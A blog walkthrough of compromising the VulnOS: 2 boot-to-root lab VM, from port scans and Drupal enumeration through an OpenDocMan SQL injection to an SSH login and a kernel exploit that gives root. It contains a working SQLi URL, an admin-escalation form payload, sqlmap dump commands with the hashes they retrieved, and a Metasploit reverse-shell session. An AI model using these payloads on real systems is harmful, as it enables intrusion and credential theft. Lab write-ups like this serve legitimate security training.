VulnOS: 2 Boot to Root VM Walkthrough

Introduction

Today I’ll be documenting how to fully compromise the VulnOS: 2 VM, created by @c4b3rw0lf.

This was a tough VM, centred around a Joomla web app. This was of particular interest to me as I’d never attempted to compromise a Joomla app prior to this VM.

Onwards!

NMap

root@kali:~# nmap -sV -T5 -p- -sC 192.168.56.104

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-17 10:52 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for cyberry.com (192.168.56.104)
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|   256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (EdDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
MAC Address: 08:00:27:57:4F:AA (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.00 seconds

Not a lot to go on here really. Outdated OpenSSH and Linux Kernel, an Apache server and what appears to be an IRC server on port 6667!

IRC Server

Connecting to the IRC server with WeeChat yields.. Nothing?

11:34:24 192.168.56.104 === | ========== End of backlog (20 lines) ==========
                │11:34:52        weechat     |   ___       __         ______________        _____
                │11:34:52        weechat     |   __ |     / /___________  ____/__  /_______ __  /_
                │11:34:52        weechat     |   __ | /| / /_  _ \  _ \  /    __  __ \  __ `/  __/
                │11:34:52        weechat     |   __ |/ |/ / /  __/  __/ /___  _  / / / /_/ // /_
                │11:34:52        weechat     |   ____/|__/  \___/\___/\____/  /_/ /_/\__,_/ \__/
                │11:34:52        weechat     | WeeChat 1.9.1 [compiled on Sep 23 2017 19:47:32]
                │11:34:52        weechat     | - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                │11:34:52        weechat     | Plugins loaded: alias, aspell, buflist, charset, exec, fifo, guile, irc, logger, lua, perl, python, relay, ruby, script, tcl, trigger, xfer
                │11:35:00 192.168.56.104  -- | irc: connecting to server 192.168.56.104/6667...
                │11:35:00 192.168.56.104  -- | irc: connected to 192.168.56.104/6667 (192.168.56.104)
                │11:35:00 192.168.56.104  -- | Welcome to the Internet Relay Network root!~root@192.168.56.102
                │11:35:00 192.168.56.104  -- | Your host is irc.example.net, running version ngircd-21 (i686/pc/linux-gnu)
                │11:35:00 192.168.56.104  -- | This server has been started Sat Mar 17 2018 at 11:48:40 (CET)
                │11:35:00 192.168.56.104  -- | irc.example.net ngircd-21 abBcCioqrRswx abehiIklmMnoOPqQrRstvVz
                │11:35:00 192.168.56.104  -- | RFC2812 IRCD=ngIRCd CHARSET=UTF-8 CASEMAPPING=ascii PREFIX=(qaohv)~&@%+ CHANTYPES=#&+ CHANMODES=beI,k,l,imMnOPQRstVz CHANLIMIT=#&+:10 :are supported on this server
                │11:35:00 192.168.56.104  -- | CHANNELLEN=50 NICKLEN=9 TOPICLEN=490 AWAYLEN=127 KICKLEN=400 MODES=5 MAXLIST=beI:50 EXCEPTS=e INVEX=I PENALTY :are supported on this server
                │11:35:00 192.168.56.104  -- | There are 1 users and 0 services on 1 servers
                │11:35:00 192.168.56.104  -- | 1 :channels formed
                │11:35:00 192.168.56.104  -- | I have 1 users, 0 services and 0 servers
                │11:35:00 192.168.56.104  -- | 1 1 :Current local users: 1, Max: 1
                │11:35:00 192.168.56.104  -- | 1 1 :Current global users: 1, Max: 1
                │11:35:00 192.168.56.104  -- | Highest connection count: 2 (8 connections received)
                │11:35:00 192.168.56.104  -- | - irc.example.net message of the day
                │11:35:00 192.168.56.104  -- | - **************************************************
                │11:35:00 192.168.56.104  -- | - *             H    E    L    L    O              *
                │11:35:00 192.168.56.104  -- | - *  This is a private irc server. Please contact  *
                │11:35:00 192.168.56.104  -- | - *  the admin of the server for any questions or  *
                │11:35:00 192.168.56.104  -- | - *  issues.                                       *
                │11:35:00 192.168.56.104  -- | - **************************************************
                │11:35:00 192.168.56.104  -- | - *  The software was provided as a package of     *
                │11:35:00 192.168.56.104  -- | - *  Debian GNU/Linux <http://www.debian.org/>.    *
                │11:35:00 192.168.56.104  -- | - *  However, Debian has no control over this      *
                │11:35:00 192.168.56.104  -- | - *  server.                                       *
                │11:35:00 192.168.56.104  -- | - **************************************************
                │11:35:00 192.168.56.104  -- | End of MOTD command
                │11:35:07 192.168.56.104  -- | You are now known as OhExFortyOne
                │[11:35] [1] [irc/192.168.56.104] 1:server[192.168.56.104]

Running /list shows that there are no channels, so we’ll park this for now and come back to it later if need be.

Web Server

Navigating to the webapp takes us to a splash screen saying “pwn the webapp!” and pointing us to a subdirectory named “/jabc”.

First up we run the usual barrage of tools against the app (Nikto and Dirb).

Nikto Output

root@kali:~# nikto -host http://192.168.56.104/jabc
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        80
+ Start Time:         2018-03-17 22:17:47 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /jabc/scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /jabc/robots.txt, fields: 0x619 0x53099f194b54d 
+ OSVDB-3268: /jabc/includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /jabc/includes/: This might be interesting...
+ OSVDB-3092: /jabc/misc/: This might be interesting...
+ OSVDB-3092: /jabc/scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /jabc/install.php: Drupal install.php file found.
+ OSVDB-3092: /jabc/install.php: install.php file found.
+ OSVDB-3092: /jabc/xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3268: /jabc/sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 36 item(s) reported on remote host
+ End Time:           2018-03-17 22:18:50 (GMT0) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Loads of stuff here to manually go through here. Important takeaways for me are –

  • This is a Drupal app (guides vulnerability research)
  • There’s an xmlrpc.php file available
    • We may be able to leverage this to get the app to do things that it shouldn’t do.
  • /jabc/scripts/ has a potential system shell available according to Nikto

Dirb

root@kali:~# dirb http://192.168.56.104/jabc

START_TIME: Sat Mar 17 22:16:55 2018
URL_BASE: http://192.168.56.104/jabc/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.104/jabc/ ----
==> DIRECTORY: http://192.168.56.104/jabc/includes/                                                                                                                                                               
+ http://192.168.56.104/jabc/index.php (CODE:200|SIZE:9525)                                                                                                                                                       
==> DIRECTORY: http://192.168.56.104/jabc/misc/                                                                                                                                                                   
==> DIRECTORY: http://192.168.56.104/jabc/modules/                                                                                                                                                                
==> DIRECTORY: http://192.168.56.104/jabc/profiles/                                                                                                                                                               
+ http://192.168.56.104/jabc/robots.txt (CODE:200|SIZE:1561)                                                                                                                                                      
==> DIRECTORY: http://192.168.56.104/jabc/scripts/                                                                                                                                                                
==> DIRECTORY: http://192.168.56.104/jabc/sites/                                                                                                                                                                  
==> DIRECTORY: http://192.168.56.104/jabc/templates/                                                                                                                                                              
==> DIRECTORY: http://192.168.56.104/jabc/themes/                                                                                                                                                                 
+ http://192.168.56.104/jabc/xmlrpc.php (CODE:200|SIZE:42)                                                                                                                                                        
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/profiles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/sites/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Mar 17 22:17:04 2018
DOWNLOADED: 4612 - FOUND: 3

Nothing hugely interesting here that isn’t available in the Nikto output.

Droopescan

After Googling for things to look for when pentesting Drupal apps, I came across this awesome library on Github. Seems to operate in a similar manner to tools like Joomscan and wpscan.

root@kali:~# droopescan scan drupal -u 192.168.56.104/jabc
[+] Themes found:                                                               
    seven http://192.168.56.104/jabc/themes/seven/
    garland http://192.168.56.104/jabc/themes/garland/

[+] No interesting urls found.

[+] Possible version(s):
    7.22
    7.23
    7.24
    7.25
    7.26

[+] Plugins found:
    ctools http://192.168.56.104/jabc/sites/all/modules/ctools/
        http://192.168.56.104/jabc/sites/all/modules/ctools/CHANGELOG.txt
        http://192.168.56.104/jabc/sites/all/modules/ctools/LICENSE.txt
        http://192.168.56.104/jabc/sites/all/modules/ctools/API.txt
    views http://192.168.56.104/jabc/sites/all/modules/views/
        http://192.168.56.104/jabc/sites/all/modules/views/README.txt
        http://192.168.56.104/jabc/sites/all/modules/views/LICENSE.txt
    token http://192.168.56.104/jabc/sites/all/modules/token/
        http://192.168.56.104/jabc/sites/all/modules/token/README.txt
        http://192.168.56.104/jabc/sites/all/modules/token/LICENSE.txt
    libraries http://192.168.56.104/jabc/sites/all/modules/libraries/
        http://192.168.56.104/jabc/sites/all/modules/libraries/CHANGELOG.txt
        http://192.168.56.104/jabc/sites/all/modules/libraries/README.txt
        http://192.168.56.104/jabc/sites/all/modules/libraries/LICENSE.txt
    entity http://192.168.56.104/jabc/sites/all/modules/entity/
        http://192.168.56.104/jabc/sites/all/modules/entity/README.txt
        http://192.168.56.104/jabc/sites/all/modules/entity/LICENSE.txt
    ckeditor http://192.168.56.104/jabc/sites/all/modules/ckeditor/
        http://192.168.56.104/jabc/sites/all/modules/ckeditor/CHANGELOG.txt
        http://192.168.56.104/jabc/sites/all/modules/ckeditor/README.txt
        http://192.168.56.104/jabc/sites/all/modules/ckeditor/LICENSE.txt
    rules http://192.168.56.104/jabc/sites/all/modules/rules/
        http://192.168.56.104/jabc/sites/all/modules/rules/README.txt
        http://192.168.56.104/jabc/sites/all/modules/rules/LICENSE.txt
    addressfield http://192.168.56.104/jabc/sites/all/modules/addressfield/
        http://192.168.56.104/jabc/sites/all/modules/addressfield/LICENSE.txt
    plupload http://192.168.56.104/jabc/sites/all/modules/plupload/
        http://192.168.56.104/jabc/sites/all/modules/plupload/CHANGELOG.txt
        http://192.168.56.104/jabc/sites/all/modules/plupload/README.txt
        http://192.168.56.104/jabc/sites/all/modules/plupload/LICENSE.txt
    commerce http://192.168.56.104/jabc/sites/all/modules/commerce/
        http://192.168.56.104/jabc/sites/all/modules/commerce/README.txt
        http://192.168.56.104/jabc/sites/all/modules/commerce/LICENSE.txt
    image http://192.168.56.104/jabc/modules/image/
    profile http://192.168.56.104/jabc/modules/profile/
    php http://192.168.56.104/jabc/modules/php/

[+] Scan finished (0:00:16.751941 elapsed)

Lots of useful info here. We can use the name and README files of those modules to search for vulnerabilities 🙂 (plupload sounds like it could be interesting right?)

Manual Probing

After a few seconds of poking around the site we find an interesting Documentation page –

The ugly highlighted text was “hidden” (black text black background), it says “For a detailed view and documentation of our products please visit our documentation platform at /jabcd0cs/, just login with guest/guest”. So let’s go and do that!

OpenDocMan Pwnage

Navigating to /jabcd0cs/ takes us to this page –

So we’ve got some kind of commercial documentation management platform here. Version 1.2.7.. Let’s see if SearchSploit has any vulnerabilities for it –

 

root@kali:~# searchsploit opendocman
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenDocMan 1.2.5 - 'add.php?last_message' Cross-Site Scripting                                                                                                            | exploits/php/webapps/33295.txt
OpenDocMan 1.2.5 - 'admin.php?last_message' Cross-Site Scripting                                                                                                          | exploits/php/webapps/33298.txt
OpenDocMan 1.2.5 - 'category.php' Cross-Site Scripting                                                                                                                    | exploits/php/webapps/33299.txt
OpenDocMan 1.2.5 - 'department.php' Cross-Site Scripting                                                                                                                  | exploits/php/webapps/33300.txt
OpenDocMan 1.2.5 - 'index.php?last_message' Cross-Site Scripting                                                                                                          | exploits/php/webapps/33297.txt
OpenDocMan 1.2.5 - 'profile.php' Cross-Site Scripting                                                                                                                     | exploits/php/webapps/33301.txt
OpenDocMan 1.2.5 - 'rejects.php' Cross-Site Scripting                                                                                                                     | exploits/php/webapps/33302.txt
OpenDocMan 1.2.5 - 'search.php' Cross-Site Scripting                                                                                                                      | exploits/php/webapps/33303.txt
OpenDocMan 1.2.5 - 'toBePublished.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                      | exploits/php/webapps/33296.txt
OpenDocMan 1.2.5 - 'user.php' Cross-Site Scripting                                                                                                                        | exploits/php/webapps/33304.txt
OpenDocMan 1.2.5 - 'view_file.php' Cross-Site Scripting                                                                                                                   | exploits/php/webapps/33305.txt
OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection                                                                                                                   | exploits/php/webapps/9903.txt
OpenDocMan 1.2.6.1 - Cross-Site Request Forgery (Password Change)                                                                                                         | exploits/php/webapps/20709.html
OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting                                                                                                                      | exploits/php/webapps/25250.txt
OpenDocMan 1.2.7 - Multiple Vulnerabilities                                                                                                                               | exploits/php/webapps/32075.txt
OpenDocMan 1.3.4 - Cross-Site Request Forgery                                                                                                                             | exploits/php/webapps/39414.txt
OpenDocMan 1.x - 'out.php' Cross-Site Scripting                                                                                                                           | exploits/php/webapps/31933.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Perfect, there are vulnerabilities for our version. Let’s read that text file and see how serious they are –

------------------------------------------------------------------------
-----------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.

1) SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of the MySQL server:

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9

2) Improper Access Control in OpenDocMan: CVE-2014-1946

The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userâ??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.

The exploitation example below assigns administrative privileges for the current account:

<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>

------------------------------------------------------------------------
-----------------------

Great, privesc from guest to admin and a SQLi vuln. Let’s plumb that SQLi vulnerability into SQLMap first and see what happens.

root@kali:~/# sqlmap -u "192.168.56.104/jabcd0cs//ajax_udf.php?q=1&add_value=odm_user" --level 3 -D drupal7 -T users --dump
......SNIP
[00:09:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL unknown
[00:09:45] [INFO] fetching columns for table 'users' in database 'drupal7'
[00:09:45] [INFO] fetching entries for table 'users' in database 'drupal7'
Database: drupal7
Table: users
[4 entries]
+-----+---------+--------------------------+---------------------------------------------------------+--------------------------+--------------------------+---------+------------+------------+--------+---------+------------+---------------+-----------+------------+------------------+
| uid | name    | init                     | pass                                                    | mail                     | data                     | theme   | login      | access     | status | picture | created    | timezone      | signature | language   | signature_format |
+-----+---------+--------------------------+---------------------------------------------------------+--------------------------+--------------------------+---------+------------+------------+--------+---------+------------+---------------+-----------+------------+------------------+
| 0   | <blank> | <blank>                  | <blank>                                                 | <blank>                  | NULL                     | <blank> | 0          | 0          | 0      | 0       | 0          | NULL          | <blank>   | <blank>    | NULL             |
| 1   | webmin  | VulnOSv2@localdomain.com | $S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug | VulnOSv2@localdomain.com | b:0;                     | <blank> | 1462351302 | 1462351302 | 1      | 0       | 1460812762 | Europe/Berlin | <blank>   | <blank>    | NULL             |
| 14  | admin   | admin@admin.com          | $S$DIrs/bRU3.0G7ctTTNNcwx4.Elkt5C2HSesdlQ.O0/wMGR7hwqAO | admin@admin.com          | a:1:{s:7:"contact";i:1;} | <blank> | 0          | 0          | 0      | 0       | 1521288471 | Europe/Berlin | <blank>   | <blank>    | filtered_html    |
| 15  | test    | test@test.com            | $S$DhT7/11SdhkG16nRHvZ8OMkJUXI2Utek2YuNn1v9IABRmcGzHY37 | test@test.com            | a:1:{s:7:"contact";i:1;} | <blank> | 0          | 0          | 0      | 0       | 1521329907 | Europe/Berlin | <blank>   | <blank>    | filtered_html    |
+-----+---------+--------------------------+---------------------------------------------------------+--------------------------+--------------------------+---------+------------+------------+--------+---------+------------+---------------+-----------+------------+------------------+

[00:09:45] [INFO] table 'drupal7.users' dumped to CSV file '/root/.sqlmap/output/192.168.56.104/dump/drupal7/users.csv'
[00:09:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.104'

Sadly that’s a salted SHA512 hash.. We’re not going to be able to crack that. Let’s try and get the admin user’s credentials from the jabcd0cs tables instead –

root@kali:~/.sqlmap/output/192.168.56.104/dump/drupal7# sqlmap -u "192.168.56.104/jabcd0cs//ajax_udf.php?q=1&add_value=odm_user" --level 3 -D jabcd0cs -T odm_user --dump
[00:53:12] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
Database: jabcd0cs                                                                                                                                                                                                
Table: odm_user
[2 entries]
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| id | phone       | Email              | username | password                                 | last_name | first_name | department | pw_reset_code |
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| 1  | 5555551212  | webmin@example.com | webmin   | b78aae356709f8c31118ea613980954b         | min       | web        | 2          | <blank>       |
| 2  | 555 5555555 | guest@example.com  | guest    | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest     | guest      | 2          | NULL          |
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+

That’s more like it. Basic MD5 hash. Let’s pop it in Crackstation and see what comes out –

Success, we’ve got a password for the webmin user now. Trying the password on the main Drupal blog didn’t work, but trying it as SSH password for user webmin did work!

root@kali:~/# ssh webmin@192.168.56.104

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Mar 17 23:13:30 CET 2018

  System load: 0.48              Memory usage: 3%   Processes:       64
  Usage of /:  5.8% of 29.91GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 10:41:07 2016
$ whoami
webmin
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
$ 

Privilege Escalation

So running uname -a on the box to get the Kernel version pointed me at this exploit, which appears to have a Metasploit module!

So I ran the SSH_login Metasploit module to get a session then upgraded it to a Meterpreter with sessions -u 2 which gets us to a point where we can run the kernel exploit!

msf auxiliary(scanner/ssh/ssh_login) > sessions -u 2
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.102:4433 
[*] Sending stage (857352 bytes) to 192.168.56.104
[*] Meterpreter session 3 opened (192.168.56.102:4433 -> 192.168.56.104:52158) at 2018-03-18 01:08:14 +0000

But sadly executing the exploit through Metasploit failed. No idea why! I then tried pulling down the same exploit as a C file from this awesome repo on Github and manually compiled it on the box aaaand….

webmin@VulnOSv2:/tmp$ vim sploit.c
webmin@VulnOSv2:/tmp$ gcc sploit.c -o sploit
webmin@VulnOSv2:/tmp$ ./sploit 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?
#

Done!

Conclusion

A great box. Took me a long time again as I went down the rabbithole (for hours) of looking for Drupal exploits when I should’ve been looking at the Documentation page a bit closer! Takeaways of this VM are to always look at page source on every page and to never forget to try weird web-based credentials as SSH credentials!

Add a Comment

Your email address will not be published. Required fields are marked *